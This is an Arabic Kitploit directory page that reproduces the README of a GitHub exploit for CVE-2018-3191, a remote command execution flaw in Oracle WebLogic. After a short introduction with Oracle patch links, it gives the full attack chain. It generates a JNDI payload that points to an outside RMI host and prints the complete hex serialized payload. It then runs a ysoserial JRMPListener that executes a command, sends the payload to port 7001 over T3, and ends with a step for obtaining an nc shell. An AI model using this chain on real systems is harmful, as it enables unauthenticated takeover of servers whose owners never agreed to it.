Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2018-3191 — Weblogic-CVE-2018-3191 ثغرة تنفيذ الأوامر عن بُعد | Kitploit
أدوات/GitHubGitHub/jas502n/cve-2018-3191
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالقيادة والسيطرةأداة الوصول عن بعد
GitHubjas502n/cve-2018-3191

CVE-2018-3191

Weblogic-CVE-2018-3191 ثغرة تنفيذ الأوامر عن بُعد

عرض المستودع
6825منذ 7 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Weblogic-CVE-2018-3191 ثغرة تنفيذ الأوامر البرمجية عن بُعد

بيئة weblogic لـ Docker

0x00 مقدمة

في 17 أكتوبر بتوقيت بكين، قامت Oracle بإصلاح ثغرة عالية الخطورة لتنفيذ الأوامر البرمجية عن بُعد في WebLogic (CVE-2018-3191) في تحديث التصحيح الحاسم لشهر أكتوبر (Critical Patch Update).

تسمح هذه الثغرة للمهاجمين غير المصادق عليهم بالوصول إلى خادم WebLogic الضعيف عبر بروتوكول T3 وإتلافه، وقد يؤدي الاستغلال الناجح للثغرة إلى سيطرة المهاجم على خادم WebLogic، مما يؤدي إلى تنفيذ الأوامر عن بُعد.

رابط CPU الرسمي من Oracle:

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html

الحل الرسمي:

قامت Oracle بالفعل بإصلاح هذه الثغرة في تحديث التصحيح الحاسم لشهر أكتوبر (Critical Patch Update)، ويُنصح بشدة المستخدمين المتأثرين بترقية التحديث في أقرب وقت ممكن للحماية.

https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html#AppendixFMW

0x01 إنشاء الحمولة

الاستخدام:

` java -jar weblogic-spring-jndi-10.3.6.0.jar rmi://www.canyouseeme.cc:6668/Jas502n >jas502n.txt

https://github.com/voidfyoo/CVE-2018-3191/releases/download/10.3.6.0/weblogic-spring-jndi-10.3.6.0.jar

wget https://github.com/voidfyoo/CVE-2018-3191/releases/download/12.2.1.3/weblogic-spring-jndi-12.2.1.3.jar

java -jar weblogic-spring-jndi.jar <jndi_address>

Example:

java -jar weblogic-spring-jndi.jar rmi://192.168.1.1:1099/Exp

weblogic-spring-jndi-12.2.1.3.jar for weblogic:

12.2.1.3

weblogic-spring-jndi-10.3.6.0.jar for weblogic:

10.3.6.0 12.2.1.0 12.1.3.0 12.2.1.1

`

root@kitploit:~
payload(hex):

aced00057372004d636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e6a74612e4a74615472616e73616374696f6e4d616e616765724ef3ecfbb628982f0200085a001a616c6c6f77437573746f6d49736f6c6174696f6e4c6576656c735a001c6175746f6465746563745472616e73616374696f6e4d616e616765725a00196175746f646574656374557365725472616e73616374696f6e5a00146361636865557365725472616e73616374696f6e5a001f757365725472616e73616374696f6e4f627461696e656446726f6d4a6e64694c00167472616e73616374696f6e4d616e616765724e616d657400124c6a6176612f6c616e672f537472696e673b4c00267472616e73616374696f6e53796e6368726f6e697a6174696f6e52656769737472794e616d6571007e00014c0013757365725472616e73616374696f6e4e616d6571007e00017872005e636f6d2e6265612e636f72652e72657061636b616765642e737072696e676672616d65776f726b2e7472616e73616374696f6e2e737570706f72742e4162737472616374506c6174666f726d5472616e73616374696f6e4d616e6167657235f8d3063abc94c402000749000e64656661756c7454696d656f75745a001d6661696c4561726c794f6e476c6f62616c526f6c6c6261636b4f6e6c795a0024676c6f62616c526f6c6c6261636b4f6e50617274696369706174696f6e4661696c7572655a00186e65737465645472616e73616374696f6e416c6c6f7765645a0017726f6c6c6261636b4f6e436f6d6d69744661696c75726549001a7472616e73616374696f6e53796e6368726f6e697a6174696f6e5a001b76616c69646174654578697374696e675472616e73616374696f6e7870ffffffff00010100000000000000010101007070740025726d693a2f2f7777772e63616e796f757365656d652e63633a363636382f4a61733530326e

0x02 الاستماع إلى Java RMI

root@kitploit:~
java -cp ysoserial-0.0.6-SNAPSHOT-BETA-all.jar ysoserial.exploit.JRMPListener 6668 CommonsCollections1 "command"

root@374bb3d9a2d8:/tools# ./rmi.sh 
* Opening JRMP listener on 6668

0x03 إرسال الحمولة إلى T3

python weblogic.py www.canyouseeme.cc 7001 jas502n.txt

0x04 الحصول على قشرة Nc

0x05 روابط مرجعية

https://github.com/voidfyoo/CVE-2018-3191

فيديو توضيحي على YouTube

CVE-2018-3191

تنزيل الأداة